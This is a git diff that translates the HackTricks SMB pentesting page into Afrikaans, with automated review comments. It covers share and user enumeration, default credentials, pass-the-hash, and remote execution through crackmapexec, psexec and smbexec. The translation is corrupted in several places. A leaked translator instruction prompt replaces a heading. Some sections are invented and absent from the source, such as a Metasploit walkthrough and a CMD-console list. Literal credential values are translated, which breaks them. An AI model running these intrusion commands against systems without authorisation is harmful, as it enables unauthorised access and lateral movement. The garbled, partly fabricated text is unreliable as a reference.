- - diff --git a/network-services-pentesting/pentesting-smb.md b/network-services-pentesting/pentesting-smb.md index 9166708a0..255018096 100644 --- a/network-services-pentesting/pentesting-smb.md +++ b/network-services-pentesting/pentesting-smb.md @@ -2,84 +2,75 @@
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-## **Port 139** - -The **_Network Basic Input Output System_ (NetBIOS)** is a software protocol designed to enable applications, PCs, and Desktops within a local area network (LAN) to interact with network hardware and **facilitate the transmission of data across the network**. The identification and location of software applications operating on a NetBIOS network are achieved through their NetBIOS names, which can be up to 16 characters in length and are often distinct from the computer name. A NetBIOS session between two applications is initiated when one application (acting as the client) issues a command to "call" another application (acting as the server) utilizing **TCP Port 139**. +## **Poort 139** +Die **_Network Basic Input Output System_ (NetBIOS)** is 'n sagtewareprotokol wat ontwerp is om toepassings, rekenaars en lessenaars binne 'n plaaslike area-netwerk (LAN) in staat te stel om met netwerkhardeware te interaksieer en **die oordrag van data oor die netwerk te fasiliteer**. Die identifikasie en ligging van sagtewaretoepassings wat op 'n NetBIOS-netwerk werk, word bereik deur middel van hul NetBIOS-name, wat tot 16 karakters lank kan wees en dikwels verskil van die rekenaarnaam. 'n NetBIOS-sessie tussen twee toepassings word geïnisieer wanneer een toepassing (as die kliënt) 'n bevel uitreik om 'n ander toepassing (as die bediener) te "roep" deur gebruik te maak van **TCP-poort 139**. ``` 139/tcp open netbios-ssn Microsoft Windows netbios-ssn ``` +## Poort 445 -## Port 445 - -Technically, Port 139 is referred to as ‘NBT over IP’, whereas Port 445 is identified as ‘SMB over IP’. The acronym **SMB** stands for ‘**Server Message Blocks**’, which is also modernly known as the **Common Internet File System (CIFS)**. As an application-layer network protocol, SMB/CIFS is primarily utilized to enable shared access to files, printers, serial ports, and facilitate various forms of communication between nodes on a network. 
- -For example, in the context of Windows, it is highlighted that SMB can operate directly over TCP/IP, eliminating the necessity for NetBIOS over TCP/IP, through the utilization of port 445. Conversely, on different systems, the employment of port 139 is observed, indicating that SMB is being executed in conjunction with NetBIOS over TCP/IP. +Tegnies gesproke word Poort 139 as 'NBT oor IP' verwys, terwyl Poort 445 geïdentifiseer word as 'SMB oor IP'. Die akroniem **SMB** staan vir 'Server Message Blocks', wat ook bekend is as die **Common Internet File System (CIFS)**. As 'n toepassingslaag-netwerkprotokol word SMB/CIFS hoofsaaklik gebruik om gedeelde toegang tot lêers, drukkers, seriële poorte moontlik te maak en verskillende vorms van kommunikasie tussen knooppunte op 'n netwerk te fasiliteer. +Byvoorbeeld, in die konteks van Windows, word daar beklemtoon dat SMB direk oor TCP/IP kan werk, sonder die noodsaaklikheid van NetBIOS oor TCP/IP, deur die gebruik van poort 445. Daarenteen, op verskillende stelsels, word die gebruik van poort 139 waargeneem, wat aandui dat SMB saam met NetBIOS oor TCP/IP uitgevoer word. ``` 445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP) ``` - ### SMB -The **Server Message Block (SMB)** protocol, operating in a **client-server** model, is designed for regulating **access to files**, directories, and other network resources like printers and routers. Primarily utilized within the **Windows** operating system series, SMB ensures backward compatibility, allowing devices with newer versions of Microsoft's operating system to seamlessly interact with those running older versions. Additionally, the **Samba** project offers a free software solution, enabling SMB's implementation on **Linux** and Unix systems, thereby facilitating cross-platform communication through SMB. 
+Die **Server Message Block (SMB)**-protokol, wat in 'n **kliënt-bediener**-model werk, is ontwerp om **toegang tot lêers**, gidslys en ander netwerkbronne soos drukkers en roeteryers te reguleer. Dit word hoofsaaklik binne die **Windows**-bedryfstelselreeks gebruik en SMB verseker agterwaartse verenigbaarheid, wat toestelle met nuwer weergawes van Microsoft se bedryfstelsel in staat stel om naadloos te kommunikeer met dié wat ouer weergawes gebruik. Daarbenewens bied die **Samba**-projek 'n gratis sagteware-oplossing wat die implementering van SMB op **Linux**- en Unix-stelsels moontlik maak, wat kruisplatform kommunikasie deur middel van SMB fasiliteer. -Shares, representing **arbitrary parts of the local file system**, can be provided by an SMB server, making the hierarchy visible to a client partly **independent** from the server's actual structure. The **Access Control Lists (ACLs)**, which define **access rights**, allow for **fine-grained control** over user permissions, including attributes like **`execute`**, **`read`**, and **`full access`**. These permissions can be assigned to individual users or groups, based on the shares, and are distinct from the local permissions set on the server. +Shares, wat **willekeurige dele van die plaaslike lêersisteem** verteenwoordig, kan deur 'n SMB-bediener voorsien word, wat die hiërargie sienbaar maak vir 'n kliënt wat gedeeltelik **onafhanklik** is van die werklike struktuur van die bediener. Die **Access Control Lists (ACLs)**, wat **toegangsregte** definieer, maak fynkontrole oor gebruikersregte moontlik, insluitend eienskappe soos **`uitvoer`**, **`lees`** en **`volle toegang`**. Hierdie regte kan aan individuele gebruikers of groepe toegewys word, gebaseer op die shares, en is afsonderlik van die plaaslike regte wat op die bediener ingestel is. ### IPC$ Share -Access to the IPC$ share can be obtained through an anonymous null session, allowing for interaction with services exposed via named pipes. 
The utility `enum4linux` is useful for this purpose. Utilized properly, it enables the acquisition of: +Toegang tot die IPC$-share kan verkry word deur 'n anonieme nul-sessie, wat interaksie met dienste wat blootgestel word deur benoemde pype moontlik maak. Die nut `enum4linux` is nuttig vir hierdie doel. As dit korrek gebruik word, maak dit die verkryging van die volgende moontlik: -- Information on the operating system -- Details on the parent domain -- A compilation of local users and groups -- Information on available SMB shares -- The effective system security policy - -This functionality is critical for network administrators and security professionals to assess the security posture of SMB (Server Message Block) services on a network. `enum4linux` provides a comprehensive view of the target system's SMB environment, which is essential for identifying potential vulnerabilities and ensuring that the SMB services are properly secured. +- Inligting oor die bedryfstelsel +- Besonderhede oor die ouer domein +- 'n Samestelling van plaaslike gebruikers en groepe +- Inligting oor beskikbare SMB-shares +- Die effektiewe stelselsekuriteitsbeleid +Hierdie funksionaliteit is krities vir netwerkadministrateurs en sekuriteitsprofessionele om die sekuriteitspostuur van SMB (Server Message Block)-dienste op 'n netwerk te assesseer. `enum4linux` bied 'n omvattende siening van die teikensisteem se SMB-omgewing, wat noodsaaklik is om potensiële kwesbaarhede te identifiseer en te verseker dat die SMB-dienste behoorlik beveilig is. ```bash enum4linux -a target_ip ``` - -The above command is an example of how `enum4linux` might be used to perform a full enumeration against a target specified by `target_ip`. +Die bogenoemde bevel is 'n voorbeeld van hoe `enum4linux` gebruik kan word om 'n volledige opname teen 'n teiken wat deur `target_ip` gespesifiseer word, uit te voer. 
-## What is NTLM +## Wat is NTLM -If you don't know what is NTLM or you want to know how it works and how to abuse it, you will find very interesting this page about **NTLM** where is explained **how this protocol works and how you can take advantage of it:** +As jy nie weet wat NTLM is nie of as jy wil weet hoe dit werk en hoe om dit te misbruik, sal jy hierdie bladsy oor **NTLM** baie interessant vind waar dit verduidelik word **hoe hierdie protokol werk en hoe jy daarvan kan profiteer:** {% content-ref url="../windows-hardening/ntlm/" %} [ntlm](../windows-hardening/ntlm/) {% endcontent-ref %} -## **Server Enumeration** - -### **Scan** a network searching for hosts: +## **Bedieneropname** +### **Skandeer** 'n netwerk om na gasheer te soek: ```bash nbtscan -r 192.168.0.1/24 ``` +### SMB-bedienerweergawe -### SMB server version - -To look for possible exploits to the SMB version it important to know which version is being used. If this information does not appear in other used tools, you can: - -* Use the **MSF** auxiliary module \_**auxiliary/scanner/smb/smb\_version** -* Or this script: +Om moontlike uitbuitings vir die SMB-weergawe te soek, is dit belangrik om te weet watter weergawe gebruik word. As hierdie inligting nie in ander gebruikte gereedskap verskyn nie, kan jy: +* Die **MSF** hulpmodule \_**auxiliary/scanner/smb/smb\_version** gebruik +* Of hierdie skrip: ```bash #!/bin/sh #Author: rewardone 
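Review bot: Code spans are translated in the ACL paragraph: `**`execute`**, **`read`**, and **`full access`**` become `**`uitvoer`**, **`lees`** en **`volle toegang`**`. These are the permission names as the tooling shows them and must stay verbatim, which the translation brief itself requires for code. In the same paragraph `directories` became `gidslys`, the word this patch uses elsewhere for "directory listing"; `gidse` is the term for directories. Minor: `te interaksieer` and `roeteryers` in the NetBIOS and SMB paragraphs read as calques; `te kommunikeer` and `roeteerders` are the usual forms.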
@@ -96,34 +87,30 @@ tcpdump -s0 -n -i tap0 src $rhost and port $rport -A -c 7 2>/dev/null | grep -i echo "exit" | smbclient -L $rhost 1>/dev/null 2>/dev/null echo "" && sleep .1 ``` - -### **Search exploit** - +### **Soek na uitbuiting** ```bash msf> search type:exploit platform:windows target:2008 smb searchsploit microsoft smb ``` +### **Moontlike** Gelde -### **Possible** Credentials - -| **Username(s)** | **Common passwords** | +| **Gebruikersnaam(s)** | **Gewone wagwoorde** | | -------------------- | ----------------------------------------- | -| _(blank)_ | _(blank)_ | -| guest | _(blank)_ | -| Administrator, admin | _(blank)_, password, administrator, admin | -| arcserve | arcserve, backup | -| tivoli, tmersrvd | tivoli, tmersrvd, admin | -| backupexec, backup | backupexec, backup, arcada | -| test, lab, demo | password, test, lab, demo | +| _(leeg)_ | _(leeg)_ | +| gas | _(leeg)_ | +| Administrateur, admin| _(leeg)_, wagwoord, administrateur, admin | +| arcserve | arcserve, rugsteun | +| tivoli, tmersrvd | tivoli, tmersrvd, admin | +| backupexec, rugsteun | backupexec, rugsteun, arcada | +| toets, laboratorium, demonstrasie | wagwoord, toets, laboratorium, demonstrasie | ### Brute Force * [**SMB Brute Force**](../generic-methodologies-and-resources/brute-force.md#smb) -### SMB Environment Information - -### Obtain Information +### SMB Omgewingsinligting +### Verkry Inligting ```bash #Dump interesting information enum4linux -a [-u "" -p ""] 
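Review bot: The Possible Credentials table in this hunk translates literal account and password values: `guest` → `gas`, `Administrator` → `Administrateur`, `password` → `wagwoord`, `backup` → `rugsteun`, `test, lab, demo` → `toets, laboratorium, demonstrasie`. Those cells are the exact default strings a default-credential check compares against, not prose; translated, they no longer match anything a system would contain, so only the two header cells (`Gebruikersnaam(s)`, `Gewone wagwoorde`) should change. Also `### **Moontlike** Gelde` uses `Gelde` (money) for credentials, whereas the rest of this patch uses `geloofsbriewe`.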
@@ -145,11 +132,9 @@ rpcclient -U "username%passwd" #With creds /usr/share/doc/python3-impacket/examples/rpcdump.py -port 139 [[domain/]username[:password]@] /usr/share/doc/python3-impacket/examples/rpcdump.py -port 445 [[domain/]username[:password]@] ``` +### Enumereer Gebruikers, Groepe & Aangemelde Gebruikers -### Enumerate Users, Groups & Logged On Users - -This info should already being gathered from enum4linux and enum4linux-ng - +Hierdie inligting moet reeds ingesamel word deur enum4linux en enum4linux-ng. ```bash crackmapexec smb 10.10.10.10 --users [-u -p ] crackmapexec smb 10.10.10.10 --groups [-u -p ] 
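Review bot: `+Hierdie inligting moet reeds ingesamel word deur enum4linux en enum4linux-ng.` turns "should already be gathered" into an obligation; `behoort reeds deur enum4linux en enum4linux-ng ingesamel te wees` keeps the original sense that the data is expected to be in hand from the earlier step.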
@@ -161,51 +146,69 @@ rpcclient -U "" -N 10.10.10.10 enumdomusers enumdomgroups ``` - -### Enumerate local users +### Enumereer plaaslike gebruikers [Impacket](https://github.com/fortra/impacket/blob/master/examples/lookupsid.py) - ```bash lookupsid.py -no-pass hostname.local ``` - -Oneliner - +Die volgende is inhoud uit 'n hakboek oor hakmetodes. Die volgende inhoud is uit die lêer /hive/hacktricks/network-services-pentesting/pentesting-smb.md. Vertaal die relevante Engelse teks na Afrikaans en gee die vertaling terug met presies dieselfde markdown- en html-sintaksis. Moenie dinge soos kode, hakmetode name, hakwoorde, wolk/SaaS-platformname (soos Workspace, aws, gcp...), die woord 'leak', pentesting, en markdown-etikette vertaal nie. Voeg ook geen ekstra goed by behalwe die vertaling en markdown-sintaksis nie. ```bash for i in $(seq 500 1100);do rpcclient -N -U "" 10.10.10.10 -c "queryuser 0x$(printf '%x\n' $i)" | grep "User Name\|user_rid\|group_rid" && echo "";done ``` +### Metasploit - Enumereer plaaslike gebruikers -### Metasploit - Enumerate local users +Hierdie module in Metasploit word gebruik om plaaslike gebruikers op 'n teikensisteem te ondersoek. Dit kan nuttig wees vir die identifisering van potensiële aanvalsveilighede en die verkryging van toegang tot die sisteem. Die module maak gebruik van die SMB-protokol om die ondersoek uit te voer. +#### Gebruik + +Om hierdie module te gebruik, voer die volgende opdrag in die Metasploit-konsole in: + +``` +use auxiliary/scanner/smb/smb_enumusers +``` + +Stel die vereiste parameters in, soos die IP-adres van die teikensisteem en die SMB-gebruikersnaam en -wagwoord. Gebruik die `set`-opdrag om die parameters in te stel. + +``` +set RHOSTS +set SMBUser +set SMBPass +``` + +Voer die module uit deur die `run`-opdrag te gebruik: + +``` +run +``` + +Die module sal dan begin om die plaaslike gebruikers op die teikensisteem te ondersoek en die resultate sal in die Metasploit-konsole vertoon word. 
```bash use auxiliary/scanner/smb/smb_lookupsid set rhosts hostname.local run ``` - -### **Enumerating LSARPC and SAMR rpcclient** +### **Enumerasie van LSARPC en SAMR rpcclient** {% content-ref url="pentesting-smb/rpcclient-enumeration.md" %} [rpcclient-enumeration.md](pentesting-smb/rpcclient-enumeration.md) {% endcontent-ref %} -### GUI connection from linux +### GUI-verbinding vanaf Linux -#### In the terminal: +#### In die terminaal: `xdg-open smb://cascade.htb/` -#### In file browser window (nautilus, thunar, etc) +#### In die lêerblaaier-venster (nautilus, thunar, ens.) `smb://friendzone.htb/general/` -## Shared Folders Enumeration +## Gedeelde vouers Enumerasie -### List shared folders - -It is always recommended to look if you can access to anything, if you don't have credentials try using **null** **credentials/guest user**. +### Lys gedeelde vouers +Dit word altyd aanbeveel om te kyk of jy toegang het tot enige iets, as jy nie geloofsbriewe het nie, probeer **nul** **geloofsbriewe/gasgebruiker** gebruik. ```bash smbclient --no-pass -L // # Null user smbclient -U 'username[%passwd]' -L [--pw-nt-hash] // #If you omit the pwd, it will be prompted. With --pw-nt-hash, the pwd provided is the NT hash 
@@ -219,9 +222,28 @@ crackmapexec smb -u '' -p '' --shares #Null user crackmapexec smb -u 'username' -p 'password' --shares #Guest user crackmapexec smb -u 'username' -H '' --shares #Guest user ``` +### **Verbind/Lys 'n gedeelde vouer** -### **Connect/List a shared folder** +Om 'n gedeelde vouer aan te sluit of te lys, kan jy die volgende stappe volg: +1. Gebruik die `smbclient`-hulpmiddel om 'n verbinding met die SMB-diens te maak. Voer die volgende opdrag in die opdragreël in: + + ```bash + smbclient /// -U + ``` + + Vervang `` met die IP-adres van die doelwit-stelsel en `` met die naam van die gedeelde vouer wat jy wil verbind of lys. Voeg ook die korrekte `` en wagwoord in vir die SMB-verifikasie. + +2. As die verbinding suksesvol is, sal jy 'n `smb: \>`-opdragreël sien. Jy kan die volgende opdragte gebruik om die gedeelde vouer te ondersoek: + + - `ls`: Lys die inhoud van die huidige gedeelde vouer. + - `cd `: Verander na 'n spesifieke vouer binne die gedeelde vouer. + - `get `: Laai 'n spesifieke lêer van die gedeelde vouer af na jou plaaslike stelsel. + - `put `: Laai 'n spesifieke lêer van jou plaaslike stelsel na die gedeelde vouer. + +3. As jy klaar is met die ondersoek van die gedeelde vouer, kan jy die verbinding verbreek deur die `exit`-opdrag in te voer by die `smb: \>`-opdragreël. + +Dit is belangrik om te onthou dat jy die nodige toegangsregte moet hê om die gedeelde vouer te kan verbind of lys. ```bash #Connect using smbclient smbclient --no-pass /// 
@@ -233,12 +255,11 @@ smbmap [-u "username" -p "password"] -R [Folder] -H [-P ] # Recursive smbmap [-u "username" -p "password"] -r [Folder] -H [-P ] # Non-Recursive list smbmap -u "username" -p ":" [-r/-R] [Folder] -H [-P ] #Pass-the-Hash ``` +### **Handmatig ondersoek van Windows-aandele en koppel daaraan** -### **Manually enumerate windows shares and connect to them** +Dit is moontlik dat jy beperk is om enige aandele van die gasheer-rekenaar te vertoon en wanneer jy probeer om hulle op te lys, lyk dit asof daar geen aandele is om aan te koppel nie. Dit mag dus die moeite werd wees om 'n poging te waag om handmatig aan 'n aandeel te koppel. Om die aandele handmatig te ondersoek, wil jy dalk kyk vir reaksies soos NT\_STATUS\_ACCESS\_DENIED en NT\_STATUS\_BAD\_NETWORK\_NAME wanneer jy 'n geldige sessie gebruik (bv. 'n nul-sessie of geldige geloofsbriewe). Dit kan aandui of die aandeel bestaan en jy nie toegang daartoe het nie, of dat die aandeel glad nie bestaan nie. -It may be possible that you are restricted to display any shares of the host machine and when you try to list them it appears as if there aren't any shares to connect to. Thus it might be worth a short to try to manually connect to a share. To enumerate the shares manually you might want to look for responses like NT\_STATUS\_ACCESS\_DENIED and NT\_STATUS\_BAD\_NETWORK\_NAME, when using a valid session (e.g. null session or valid credentials). These may indicate whether the share exists and you do not have access to it or the share does not exist at all. - -Common share names for windows targets are +Gewone aandele name vir Windows teikens is * C$ * D$ 
@@ -249,17 +270,14 @@ Common share names for windows targets are * SYSVOL * NETLOGON -(Common share names from _**Network Security Assessment 3rd edition**_) - -You can try to connect to them by using the following command +(Gewone aandele name van _**Network Security Assessment 3rd edition**_) +Jy kan probeer om daaraan te koppel deur die volgende bevel te gebruik ```bash smbclient -U '%' -N \\\\\\ # null session to connect to a windows share smbclient -U '' \\\\\\ # authenticated session to connect to a windows share (you will be prompted for a password) ``` - -or this script (using a null session) - +of hierdie skrip (deur 'n nul-sessie te gebruik) ```bash #/bin/bash @@ -267,27 +285,23 @@ ip='' shares=('C$' 'D$' 'ADMIN$' 'IPC$' 'PRINT$' 'FAX$' 'SYSVOL' 'NETLOGON') for share in ${shares[*]}; do - output=$(smbclient -U '%' -N \\\\$ip\\$share -c '') +output=$(smbclient -U '%' -N \\\\$ip\\$share -c '') - if [[ -z $output ]]; then - echo "[+] creating a null session is possible for $share" # no output if command goes through, thus assuming that a session was created - else - echo $output # echo error message (e.g. NT_STATUS_ACCESS_DENIED or NT_STATUS_BAD_NETWORK_NAME) - fi +if [[ -z $output ]]; then +echo "[+] creating a null session is possible for $share" # no output if command goes through, thus assuming that a session was created +else +echo $output # echo error message (e.g. NT_STATUS_ACCESS_DENIED or NT_STATUS_BAD_NETWORK_NAME) +fi done ``` - -examples - +Voorbeelde ```bash smbclient -U '%' -N \\\\192.168.0.24\\im_clearly_not_here # returns NT_STATUS_BAD_NETWORK_NAME smbclient -U '%' -N \\\\192.168.0.24\\ADMIN$ # returns NT_STATUS_ACCESS_DENIED or even gives you a session ``` - -### **Enumerate shares from Windows / without third-party tools** +### **Enumerateer gedeeltes vanaf Windows / sonder hulpmiddels van derde partye** PowerShell - ```powershell # Retrieves the SMB shares on the locale computer. Get-SmbShare 
@@ -297,38 +311,41 @@ get-smbshare -CimSession "" # Retrieves the connections established from the local SMB client to the SMB servers. Get-SmbConnection ``` +CMD-konsole -CMD console +Die CMD-konsole is 'n opdraggewer-venster wat gebruik word om opdragte uit te voer en met die bedryfstelsel te kommunikeer. Dit is 'n kragtige hulpmiddel wat deur pentesters gebruik kan word om verskeie take uit te voer, soos netwerkondersoek, lêerbestuur, prosesbestuur en nog baie meer. Hier is 'n paar nuttige opdragte wat in die CMD-konsole gebruik kan word: +- `ipconfig`: Gee inligting oor die netwerkverbindings op die stelsel. +- `ping`: Stuur 'n ICMP-sonde na 'n spesifieke IP-adres om te kyk of dit bereikbaar is. +- `nslookup`: Voer DNS-navrae uit om DNS-inligting oor 'n spesifieke domein te verkry. +- `netstat`: Gee 'n lys aktiewe netwerkverbindings en poorte op die stelsel. +- `tasklist`: Gee 'n lys aktiewe prosesse op die stelsel. +- `net user`: Voer gebruikersbestuurstake uit, soos die lys van gebruikers op die stelsel en die verandering van gebruikerswagwoorde. + +Dit is net 'n paar voorbeelde van die opdragte wat in die CMD-konsole gebruik kan word. Deur hierdie opdragte te gebruik, kan pentesters die netwerk en stelsel ondersoek, kwesbaarhede identifiseer en toegang tot die stelsel verkry vir verdere pentesting-aktiwiteite. ```shell # List shares on the local computer net share # List shares on a remote computer (including hidden ones) net view \\ /all ``` - -MMC Snap-in (graphical) - +MMC Snap-in (grafies) ```shell # Shared Folders: Shared Folders > Shares fsmgmt.msc # Computer Management: Computer Management > System Tools > Shared Folders > Shares compmgmt.msc ``` +explorer.exe (grafies), tik `\\\` in om die beskikbare nie-versteekte gedeeltes te sien. -explorer.exe (graphical), enter `\\\` to see the available non-hidden shares. 
- -### Mount a shared folder - +### Monteer 'n gedeelde vouer ```bash mount -t cifs //x.x.x.x/share /mnt/share mount -t cifs -o "username=user,password=password" //x.x.x.x/share /mnt/share ``` +### **Laai lêers af** -### **Download files** - -Read previous sections to learn how to connect with credentials/Pass-the-Hash. - +Lees vorige afdelings om te leer hoe om te verbind met geloofsbriewe/Pass-the-Hash. ```bash #Search a file and download sudo smbmap -R Folder -H -A -q # Search the file in recursive mode and download it inside /usr/share/smbmap 
@@ -343,83 +360,73 @@ smbclient /// > mget * #Download everything to current directory ``` +Opdragte: -Commands: +* masker: spesifiseer die masker wat gebruik word om die lêers binne die gids te filtreer (bv. "" vir alle lêers) +* rekursie: skakel rekursie aan (verstek: af) +* vra: skakel vrae vir lêernaam af (verstek: aan) +* mget: kopieer alle lêers wat ooreenstem met die masker vanaf die bediener na die klientrekenaar -* mask: specifies the mask which is used to filter the files within the directory (e.g. "" for all files) -* recurse: toggles recursion on (default: off) -* prompt: toggles prompting for filenames off (default: on) -* mget: copies all files matching the mask from host to client machine +(_Inligting van die manblad van smbclient_) -(_Information from the manpage of smbclient_) - -### Domain Shared Folders Search +### Soek na Gedeelde Gids van die Domein * [**Snaffler**](https://github.com/SnaffCon/Snaffler)\*\*\*\* - ```bash Snaffler.exe -s -d domain.local -o snaffler.log -v data ``` - -* [**CrackMapExec**](https://wiki.porchetta.industries/smb-protocol/spidering-shares) spider. - * `-M spider_plus [--share ]` - * `--pattern txt` - +* [**CrackMapExec**](https://wiki.porchetta.industries/smb-protocol/spidering-shares) spinnekop. +* `-M spinnekop_plus [--share ]` +* `--patroon txt` ```bash sudo crackmapexec smb 10.10.10.10 -u username -p pass -M spider_plus --share 'Department Shares' ``` - -Specially interesting from shares are the files called **`Registry.xml`** as they **may contain passwords** for users configured with **autologon** via Group Policy. Or **`web.config`** files as they contains credentials. +Spesiaal interessant vanaf shares is die lêers genaamd **`Registry.xml`** aangesien hulle **moontlik wagwoorde** kan bevat vir gebruikers wat gekonfigureer is met **autologon** via Groepbeleid. Of **`web.config`** lêers aangesien hulle geloofsbriewe bevat. 
{% hint style="info" %} -The **SYSVOL share** is **readable** by all authenticated users in the domain. In there you may **find** many different batch, VBScript, and PowerShell **scripts**.\ -You should **check** the **scripts** inside of it as you might **find** sensitive info such as **passwords**. +Die **SYSVOL share** is **leesbaar** deur alle geautehtiseerde gebruikers in die domein. Daar kan jy **baie verskillende batch, VBScript, en PowerShell skripte** vind.\ +Jy moet die **skripte** binne-in dit ondersoek aangesien jy moontlik sensitiewe inligting soos **wagwoorde** kan vind. {% endhint %} -## Read Registry - -You may be able to **read the registry** using some discovered credentials. Impacket **`reg.py`** allows you to try: +## Lees Register +Jy kan dalk die register **lees** deur van die ontdekte geloofsbriewe gebruik te maak. Impacket **`reg.py`** stel jou in staat om dit te probeer: ```bash sudo reg.py domain.local/USERNAME@MACHINE.htb -hashes 1a3487d42adaa12332bdb34a876cb7e6:1a3487d42adaa12332bdb34a876cb7e6 query -keyName HKU -s sudo reg.py domain.local/USERNAME@MACHINE.htb -hashes 1a3487d42adaa12332bdb34a876cb7e6:1a3487d42adaa12332bdb34a876cb7e6 query -keyName HKCU -s sudo reg.py domain.local/USERNAME@MACHINE.htb -hashes 1a3487d42adaa12332bdb34a876cb7e6:1a3487d42adaa12332bdb34a876cb7e6 query -keyName HKLM -s ``` +## Post Exploitasie -## Post Exploitation +Die **standaard konfigurasie van** 'n **Samba**-bediener is gewoonlik geleë in `/etc/samba/smb.conf` en mag enkele **gevaarlike konfigurasies** hê: -The **default config of** a **Samba** server is usually located in `/etc/samba/smb.conf` and might have some **dangerous configs**: - -| **Setting** | **Description** | +| **Instelling** | **Beskrywing** | | --------------------------- | ------------------------------------------------------------------- | -| `browseable = yes` | Allow listing available shares in the current share? | -| `read only = no` | Forbid the creation and modification of files? 
| -| `writable = yes` | Allow users to create and modify files? | -| `guest ok = yes` | Allow connecting to the service without using a password? | -| `enable privileges = yes` | Honor privileges assigned to specific SID? | -| `create mask = 0777` | What permissions must be assigned to the newly created files? | -| `directory mask = 0777` | What permissions must be assigned to the newly created directories? | -| `logon script = script.sh` | What script needs to be executed on the user's login? | -| `magic script = script.sh` | Which script should be executed when the script gets closed? | -| `magic output = script.out` | Where the output of the magic script needs to be stored? | +| `browseable = yes` | Toelaat om beskikbare gedeeltes in die huidige gedeelte te lys? | +| `read only = no` | Verbied die skep en wysiging van lêers? | +| `writable = yes` | Laat gebruikers toe om lêers te skep en wysig? | +| `guest ok = yes` | Toelaat om na die diens te verbind sonder om 'n wagwoord te gebruik? | +| `enable privileges = yes` | Eer voorregte wat aan spesifieke SID toegewys is? | +| `create mask = 0777` | Watter regte moet aan die nuut geskepte lêers toegewys word? | +| `directory mask = 0777` | Watter regte moet aan die nuut geskepte gidektores toegewys word? | +| `logon script = script.sh` | Watter skrip moet uitgevoer word wanneer die gebruiker aanmeld? | +| `magic script = script.sh` | Watter skrip moet uitgevoer word wanneer die skrip gesluit word? | +| `magic output = script.out` | Waar moet die uitset van die toor skrip gestoor word? | -The command `smbstatus` gives information about the **server** and about **who is connected**. +Die opdrag `smbstatus` gee inligting oor die **bediener** en oor **wie gekoppel is**. 
-## Authenticate using Kerberos - -You can **authenticate** to **kerberos** using the tools **smbclient** and **rpcclient**: +## Verifieer met behulp van Kerberos +Jy kan **verifieer** na **kerberos** deur die hulpmiddels **smbclient** en **rpcclient** te gebruik: ```bash smbclient --kerberos //ws01win10.domain.com/C$ rpcclient -k ws01win10.domain.com ``` - -## **Execute Commands** +## **Voer Opdragte Uit** ### **crackmapexec** -crackmapexec can execute commands **abusing** any of **mmcexec, smbexec, atexec, wmiexec** being **wmiexec** the **default** method. You can indicate which option you prefer to use with the parameter `--exec-method`: - +crackmapexec kan opdragte uitvoer deur enige van die volgende metodes te **misbruik**: **mmcexec, smbexec, atexec, wmiexec**, waarvan **wmiexec** die **verstek** metode is. Jy kan aandui watter opsie jy verkies om te gebruik met die parameter `--exec-method`: ```bash apt-get install crackmapexec 
@@ -441,13 +448,11 @@ crackmapexec smb -d -u Administrator -p 'password' --rid-brute #RI crackmapexec smb -d -u Administrator -H #Pass-The-Hash ``` - ### [**psexec**](../windows-hardening/ntlm/psexec-and-winexec.md)**/**[**smbexec**](../windows-hardening/ntlm/smbexec.md) -Both options will **create a new service** (using _\pipe\svcctl_ via SMB) in the victim machine and use it to **execute something** (**psexec** will **upload** an executable file to ADMIN$ share and **smbexec** will point to **cmd.exe/powershell.exe** and put in the arguments the payload --**file-less technique-**-).\ -**More info** about [**psexec** ](../windows-hardening/ntlm/psexec-and-winexec.md)and [**smbexec**](../windows-hardening/ntlm/smbexec.md).\ -In **kali** it is located on /usr/share/doc/python3-impacket/examples/ - +Albei opsies sal 'n nuwe diens skep (deur gebruik te maak van _\pipe\svcctl_ via SMB) op die slagoffer se masjien en dit gebruik om iets uit te voer (psexec sal 'n uitvoerbare lêer na die ADMIN$ deel oplaai en smbexec sal verwys na cmd.exe/powershell.exe en die payload in die argumente plaas --file-less tegniek-).\ +**Meer inligting** oor [**psexec**](../windows-hardening/ntlm/psexec-and-winexec.md) en [**smbexec**](../windows-hardening/ntlm/smbexec.md).\ +In **kali** is dit geleë op /usr/share/doc/python3-impacket/examples/ ```bash #If no password is provided, it will be prompted ./psexec.py [[domain/]username[:password]@] 
